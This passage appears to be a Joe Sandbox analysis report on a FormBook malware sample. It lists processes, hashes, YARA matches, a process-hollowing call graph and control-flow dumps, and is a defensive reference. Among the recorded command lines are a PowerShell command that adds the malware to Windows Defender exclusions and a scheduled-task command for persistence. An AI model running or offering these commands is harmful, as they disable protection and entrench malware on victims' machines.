                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:04:19:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe"
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:04:19:55
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:303'104 bytes
                                                                                                            MD5 hash:5F2122888583347C9B81724CF169EFC6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:15
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:17
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"
                                                                                                            Imagebase:0xc30000
                                                                                                            File size:179'712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:19
                                                                                                            Start time:04:20:02
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x11b0000
                                                                                                            File size:45'248 bytes
                                                                                                            MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:20
                                                                                                            Start time:04:20:07
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe"
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:04:20:25
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x13a0000
                                                                                                            File size:517'064 bytes
                                                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:20.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:10.5%
                                                                                                              Total number of Nodes:76
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 9396 656e7f 9399 6593f0 9396->9399 9397 656e8e 9400 65940a 9399->9400 9410 659412 9400->9410 9413 6598e8 9400->9413 9417 659c48 9400->9417 9422 659ba9 9400->9422 9427 65998d 9400->9427 9432 659740 9400->9432 9437 659de0 9400->9437 9441 659a84 9400->9441 9445 659be4 9400->9445 9449 659e5d 9400->9449 9453 65a253 9400->9453 9458 659c97 9400->9458 9410->9397 9414 659902 9413->9414 9415 659882 9414->9415 9462 656238 9414->9462 9415->9410 9418 659c5d 9417->9418 9466 656321 9418->9466 9470 656328 9418->9470 9419 659c78 9419->9410 9423 659bc4 9422->9423 9474 656580 9423->9474 9478 656578 9423->9478 9424 659f68 9429 659bc5 9427->9429 9428 659f68 9430 656580 WriteProcessMemory 9429->9430 9431 656578 WriteProcessMemory 9429->9431 9430->9428 9431->9428 9434 659783 9432->9434 9433 65a2c2 9433->9410 9434->9433 9482 656918 9434->9482 9439 656580 WriteProcessMemory 9437->9439 9440 656578 WriteProcessMemory 9437->9440 9438 659e04 9438->9410 9439->9438 9440->9438 9442 659a9c 9441->9442 9444 656238 ResumeThread 9442->9444 9443 659882 9443->9410 9444->9443 9486 656450 9445->9486 9490 656458 9445->9490 9446 659c02 9451 656580 WriteProcessMemory 9449->9451 9452 656578 WriteProcessMemory 9449->9452 9450 659e8b 9451->9450 9452->9450 9455 65980b 9453->9455 9454 65a2c2 9454->9410 9455->9454 9457 656918 CreateProcessA 9455->9457 9456 659857 9456->9410 9457->9456 9494 6566e0 9458->9494 9498 6566d9 9458->9498 9459 659882 9459->9410 9463 65627c ResumeThread 9462->9463 9465 6562ce 9463->9465 9465->9415 9467 656371 Wow64SetThreadContext 9466->9467 9469 6563ef 9467->9469 9469->9419 9471 656371 Wow64SetThreadContext 9470->9471 9473 6563ef 9471->9473 9473->9419 9475 6565cc WriteProcessMemory 9474->9475 9477 65666b 9475->9477 9477->9424 9479 656584 WriteProcessMemory 9478->9479 9481 65666b 9479->9481 9481->9424 9483 65699f CreateProcessA 9482->9483 9485 656bfd 9483->9485 9487 656458 VirtualAllocEx 9486->9487 9489 65651a 9487->9489 9489->9446 9491 65649c VirtualAllocEx 9490->9491 9493 65651a 9491->9493 9493->9446 9495 65672c ReadProcessMemory 9494->9495 9497 6567aa 9495->9497 9497->9459 9499 65672c ReadProcessMemory 9498->9499 9501 6567aa 9499->9501 9501->9459 9502 1bae00 9503 1bae4d VirtualProtect 9502->9503 9504 1baebf 9503->9504

                                                                                                              Executed Functions

                                                                                                              Function 001B5E80 Relevance: 4.1, Strings: 3, Instructions: 392COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 1b5e80-1b5e94 1 1b5ef2-1b5f04 0->1 2 1b5e96-1b5eb8 0->2 5 1b5f58-1b5f8d 1->5 6 1b5f06-1b5f11 1->6 3 1b5eba-1b5ec4 2->3 4 1b5f12 2->4 9 1b5f1a-1b5f3c 3->9 10 1b5ec6-1b5ee8 3->10 4->9 7 1b5f8f 5->7 8 1b5f94-1b5fd2 call 1b6511 5->8 6->4 13 1b5f91-1b5f92 7->13 17 1b5fd8 8->17 9->13 16 1b5f3e-1b5f46 9->16 11 1b5eea-1b5ef0 10->11 12 1b5f47-1b5f56 10->12 12->5 13->8 16->12 18 1b5fdf-1b5ffb 17->18 19 1b5ffd 18->19 20 1b6004-1b6005 18->20 19->17 21 1b635b-1b6362 19->21 22 1b600a-1b600e 19->22 23 1b619b-1b61b2 19->23 24 1b613a-1b615a 19->24 25 1b615f-1b6171 19->25 26 1b633f-1b6356 19->26 27 1b61fd-1b6201 19->27 28 1b625d-1b6269 19->28 29 1b61d1-1b61de 19->29 30 1b6110-1b611c 19->30 31 1b61b7-1b61cc 19->31 32 1b6037-1b6049 19->32 33 1b6176-1b6196 19->33 34 1b60d6-1b60e8 19->34 35 1b6315-1b6321 19->35 36 1b604b-1b6054 19->36 37 1b62eb-1b6310 19->37 38 1b622d-1b6231 19->38 39 1b60ed-1b610b 19->39 40 1b61e3-1b61f8 19->40 41 1b6080-1b6098 19->41 20->21 20->22 44 1b6021-1b6028 22->44 45 1b6010-1b601f 22->45 23->18 24->18 25->18 26->18 50 1b6203-1b6212 27->50 51 1b6214-1b621b 27->51 56 1b626b 28->56 57 1b6270-1b6286 28->57 29->18 42 1b611e 30->42 43 1b6123-1b6135 30->43 31->18 32->18 33->18 34->18 48 1b6328-1b633a 35->48 49 1b6323 35->49 46 1b6067-1b606e 36->46 47 1b6056-1b6065 36->47 37->18 54 1b6233-1b6242 38->54 55 1b6244-1b624b 38->55 39->18 40->18 52 1b609a 41->52 53 1b609f-1b60b5 41->53 42->43 43->18 60 1b602f-1b6035 44->60 45->60 63 1b6075-1b607b 46->63 47->63 48->18 49->48 64 1b6222-1b6228 50->64 51->64 52->53 70 1b60bc-1b60d1 53->70 71 1b60b7 53->71 65 1b6252-1b6258 54->65 55->65 56->57 72 1b6288 57->72 73 1b628d-1b62a3 57->73 60->18 63->18 64->18 65->18 70->18 71->70 72->73 76 1b62aa-1b62c0 73->76 77 1b62a5 73->77 79 1b62c2 76->79 80 1b62c7-1b62e6 76->80 77->76 79->80 80->18
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: e0e58ddb2fd209d49b78f0ae25c8be0711af1e700d6034f7f63a3829613a3f0f
                                                                                                              • Instruction ID: 4bc551cd53b4b1e6526afead3f4f4f415325ef1a0b1300bd51445c8463c78172
                                                                                                              • Opcode Fuzzy Hash: e0e58ddb2fd209d49b78f0ae25c8be0711af1e700d6034f7f63a3829613a3f0f
                                                                                                              • Instruction Fuzzy Hash: 04F16F70915249DFCB08CFA9C8809EEFBB2FF9A300B258599D4119B265C734E986CF95
                                                                                                              Function 001B5F68 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 83 1b5f68-1b5f8d 84 1b5f8f-1b5f92 83->84 85 1b5f94-1b5fd2 call 1b6511 83->85 84->85 88 1b5fd8 85->88 89 1b5fdf-1b5ffb 88->89 90 1b5ffd 89->90 91 1b6004-1b6005 89->91 90->88 92 1b635b-1b6362 90->92 93 1b600a-1b600e 90->93 94 1b619b-1b61b2 90->94 95 1b613a-1b615a 90->95 96 1b615f-1b6171 90->96 97 1b633f-1b6356 90->97 98 1b61fd-1b6201 90->98 99 1b625d-1b6269 90->99 100 1b61d1-1b61de 90->100 101 1b6110-1b611c 90->101 102 1b61b7-1b61cc 90->102 103 1b6037-1b6049 90->103 104 1b6176-1b6196 90->104 105 1b60d6-1b60e8 90->105 106 1b6315-1b6321 90->106 107 1b604b-1b6054 90->107 108 1b62eb-1b6310 90->108 109 1b622d-1b6231 90->109 110 1b60ed-1b610b 90->110 111 1b61e3-1b61f8 90->111 112 1b6080-1b6098 90->112 91->92 91->93 115 1b6021-1b6028 93->115 116 1b6010-1b601f 93->116 94->89 95->89 96->89 97->89 121 1b6203-1b6212 98->121 122 1b6214-1b621b 98->122 127 1b626b 99->127 128 1b6270-1b6286 99->128 100->89 113 1b611e 101->113 114 1b6123-1b6135 101->114 102->89 103->89 104->89 105->89 119 1b6328-1b633a 106->119 120 1b6323 106->120 117 1b6067-1b606e 107->117 118 1b6056-1b6065 107->118 108->89 125 1b6233-1b6242 109->125 126 1b6244-1b624b 109->126 110->89 111->89 123 1b609a 112->123 124 1b609f-1b60b5 112->124 113->114 114->89 131 1b602f-1b6035 115->131 116->131 134 1b6075-1b607b 117->134 118->134 119->89 120->119 135 1b6222-1b6228 121->135 122->135 123->124 141 1b60bc-1b60d1 124->141 142 1b60b7 124->142 136 1b6252-1b6258 125->136 126->136 127->128 143 1b6288 128->143 144 1b628d-1b62a3 128->144 131->89 134->89 135->89 136->89 141->89 142->141 143->144 147 1b62aa-1b62c0 144->147 148 1b62a5 144->148 150 1b62c2 147->150 151 1b62c7-1b62e6 147->151 148->147 150->151 151->89
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: 0181359e7df92822d2d83ea1d1bd7f2a3bdcc83243db091712d97dfd38ba26e4
                                                                                                              • Instruction ID: f17610e59ecebdc3c7c6603fcb1ecaf5c1bbb48475b54c8a20d1d91c62d6ef3c
                                                                                                              • Opcode Fuzzy Hash: 0181359e7df92822d2d83ea1d1bd7f2a3bdcc83243db091712d97dfd38ba26e4
                                                                                                              • Instruction Fuzzy Hash: AEC13C70D0521ADFCB08DFA6C8849EEFBB2FF89300B25C559D416A7254D734AA82CF95
                                                                                                              Function 001BCC5A Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 154 1bcc5a-1bcc8d 155 1bcc8f 154->155 156 1bcc94-1bccc5 154->156 155->156 157 1bccc6 156->157 158 1bcccd-1bcce9 157->158 159 1bcceb 158->159 160 1bccf2-1bccf3 158->160 159->157 159->160 161 1bcefb-1bcf0d 159->161 162 1bccf8-1bcd3a 159->162 163 1bcf5f-1bcf68 159->163 164 1bce9f-1bceb2 159->164 165 1bcede-1bcef6 159->165 166 1bcdfc-1bce00 159->166 167 1bcd3c-1bcd4f 159->167 168 1bce73-1bce9a 159->168 169 1bce33-1bce46 159->169 170 1bcf12-1bcf24 159->170 171 1bcd97-1bcd9a 159->171 172 1bcd54 159->172 173 1bce4b-1bce60 159->173 174 1bcf29-1bcf40 159->174 175 1bcdc8-1bcddf 159->175 176 1bcd80-1bcd92 159->176 177 1bce65-1bce6e 159->177 178 1bcf45-1bcf5a 159->178 179 1bcde4-1bcdf7 159->179 160->163 161->158 162->158 182 1bcec5-1bcecc 164->182 183 1bceb4-1bcec3 164->183 165->158 180 1bce13-1bce1a 166->180 181 1bce02-1bce11 166->181 167->158 168->158 169->158 170->158 185 1bcda3-1bcdc3 171->185 188 1bcd5d-1bcd7b 172->188 173->158 174->158 175->158 176->158 177->158 178->158 179->158 186 1bce21-1bce2e 180->186 181->186 184 1bced3-1bced9 182->184 183->184 184->158 185->158 186->158 188->158
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361
                                                                                                              • Opcode ID: 5900a5f3daaf08c0150abf20aba0d345e7ea93700b9aae87f6eab46b65c6fe53
                                                                                                              • Instruction ID: 994fcd4e0af841305aa6390dc11b6759c277a0c3199a7fbeb57008887921cb17
                                                                                                              • Opcode Fuzzy Hash: 5900a5f3daaf08c0150abf20aba0d345e7ea93700b9aae87f6eab46b65c6fe53
                                                                                                              • Instruction Fuzzy Hash: 93A1F775D05609DFCB08CFA6D9805EEFFB2EF89310F24952AE419AB264D7309942DF90
                                                                                                              Function 001B3D8E Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: z^I
                                                                                                              • API String ID: 0-307258731
                                                                                                              • Opcode ID: 8d99c4971eea75240118c729d3670b7837e313bdd1dd004c1cd2cf3570ef2b4e
                                                                                                              • Instruction ID: b35dd0db0b3772a80b6248c8fe58b0f2499107b0d258d584be04579526e72635
                                                                                                              • Opcode Fuzzy Hash: 8d99c4971eea75240118c729d3670b7837e313bdd1dd004c1cd2cf3570ef2b4e
                                                                                                              • Instruction Fuzzy Hash: 43B12674E142098FCB08CFA9C984ADEFBF2FF89300F24956AD415AB268D734A945CF50
                                                                                                              Function 001B3E00 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: z^I
                                                                                                              • API String ID: 0-307258731
                                                                                                              • Opcode ID: dc34ae7639d353bd47c6ce425f78841461d06b5231db6874dc890bacd8629761
                                                                                                              • Instruction ID: c7eda53bd3ad5323abbc6daf2ccda474faf33847a805650acc8423eeb643ba5a
                                                                                                              • Opcode Fuzzy Hash: dc34ae7639d353bd47c6ce425f78841461d06b5231db6874dc890bacd8629761
                                                                                                              • Instruction Fuzzy Hash: 9B91C374E142198FCB08CFAAC984AEEFBB2EF88310F24952AD415BB364D7349945CF54
                                                                                                              Function 001BB630 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5=6
                                                                                                              • API String ID: 0-2897083178
                                                                                                              • Opcode ID: db18517af5118c1df9308884d04bf9287928dab6a08ea41dbecc2bbc1c8d3f85
                                                                                                              • Instruction ID: 651e14d0f94c2dc132553038dc31891fd556a6f18a9547f0c0c803604c533d9b
                                                                                                              • Opcode Fuzzy Hash: db18517af5118c1df9308884d04bf9287928dab6a08ea41dbecc2bbc1c8d3f85
                                                                                                              • Instruction Fuzzy Hash: 98713675E0920A9FCB08CFA5DD844EEFBB2FF89300B11982AD016E7664D7B49A41CF55
                                                                                                              Function 001BBC38 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: iUfo
                                                                                                              • API String ID: 0-3820436262
                                                                                                              • Opcode ID: 76c433e7bb9bac71f0172c294c0da342ceb7d1aa386687ec5d40754744609777
                                                                                                              • Instruction ID: 217201cee2f0f50f7e5e36a1a0e5f5a5ab95cdf689f5340b8832687f97516f7d
                                                                                                              • Opcode Fuzzy Hash: 76c433e7bb9bac71f0172c294c0da342ceb7d1aa386687ec5d40754744609777
                                                                                                              • Instruction Fuzzy Hash: A451E3B4E052199FCB18CFA9D9845EEFBF2BF88300F20942AD406B7764EB7499418F55
                                                                                                              Function 001B46B0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: -2m
                                                                                                              • API String ID: 0-2686427999
                                                                                                              • Opcode ID: 09ab71a6eb47baed058a812aa46dfb8ee883cdb678b13634c1f70dfc72b913ff
                                                                                                              • Instruction ID: 1439a3237d145889254085a588e7f9bf7da868ff98465110ed3ecc8af6bccb0c
                                                                                                              • Opcode Fuzzy Hash: 09ab71a6eb47baed058a812aa46dfb8ee883cdb678b13634c1f70dfc72b913ff
                                                                                                              • Instruction Fuzzy Hash: BD513874E042598FDB08CFAAC9806EEFBF2EF89300F24D06AD409A7255D7349941CFA4
                                                                                                              Function 001B11F8 Relevance: .9, Instructions: 851COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77d630bedd182c2f52a05bb1a438656b2feefa014e15f124b49af452d817ab7f
                                                                                                              • Instruction ID: 2f52195c51da6c4f21eebdd0bf1d33f80ade2ea932095d1849615d750aff1059
                                                                                                              • Opcode Fuzzy Hash: 77d630bedd182c2f52a05bb1a438656b2feefa014e15f124b49af452d817ab7f
                                                                                                              • Instruction Fuzzy Hash: 1692F634A10659CFD725DF64C894BD9B3B2BF8A300F1186EAE4496B361DB31AE85CF50
                                                                                                              Function 001B04E8 Relevance: .8, Instructions: 843COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5adf0b26f5fdc3697bfeb94a328be923d5a7ca31d2f3a1e63d943d982db0c95
                                                                                                              • Instruction ID: 1056ae4e4b9d9986b333b21136ad9f8e7e7c22627f4e8799d9a39d4bc0ded338
                                                                                                              • Opcode Fuzzy Hash: f5adf0b26f5fdc3697bfeb94a328be923d5a7ca31d2f3a1e63d943d982db0c95
                                                                                                              • Instruction Fuzzy Hash: D792E534A10619CFD725DF64C894BD9B3B2BF9A300F1186EAE4496B361DB31AE85CF50
                                                                                                              Function 00659740 Relevance: .2, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82b87466c10197e966c1b84ec2413eb29e31e206a7e91548307402cbef406121
                                                                                                              • Instruction ID: 2d0ff5a41f64fa1822373fdbbec38c8a8d345a9099a760215845f206dbd002cd
                                                                                                              • Opcode Fuzzy Hash: 82b87466c10197e966c1b84ec2413eb29e31e206a7e91548307402cbef406121
                                                                                                              • Instruction Fuzzy Hash: A3711871D45229CBEB24CF66CC447EDBBB6BF89301F14C1EAD809A6250EB705A89CF51
                                                                                                              Function 00651906 Relevance: .1, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12c8ad73dfcb746c1332110344f1b815f5db924f2195d7b70f902c9a87047346
                                                                                                              • Instruction ID: 3a49338f92f8665da18471b470f2e076447c76ea129c6ac0d404665cc9207d0e
                                                                                                              • Opcode Fuzzy Hash: 12c8ad73dfcb746c1332110344f1b815f5db924f2195d7b70f902c9a87047346
                                                                                                              • Instruction Fuzzy Hash: B3512774D05248CFDB14CFA5C8847EDBBB2FF4A306F2485A6D80AAB261D7305A4ACF00
                                                                                                              Function 006598E8 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1837eb6dbf11e13da087a1f73ef652ae28e20bbedf4ac4054cbc097ae717b6e
                                                                                                              • Instruction ID: d4fedd0760e816fc2da5fdf88c6573acac70fdaa33816c15a4f20e94cbe37366
                                                                                                              • Opcode Fuzzy Hash: c1837eb6dbf11e13da087a1f73ef652ae28e20bbedf4ac4054cbc097ae717b6e
                                                                                                              • Instruction Fuzzy Hash: 55412A34909218CFCB24CFA4DD447E8B7B6AB4A316F1495EAD80DA7291D7314ECACF61
                                                                                                              Function 001B50E8 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
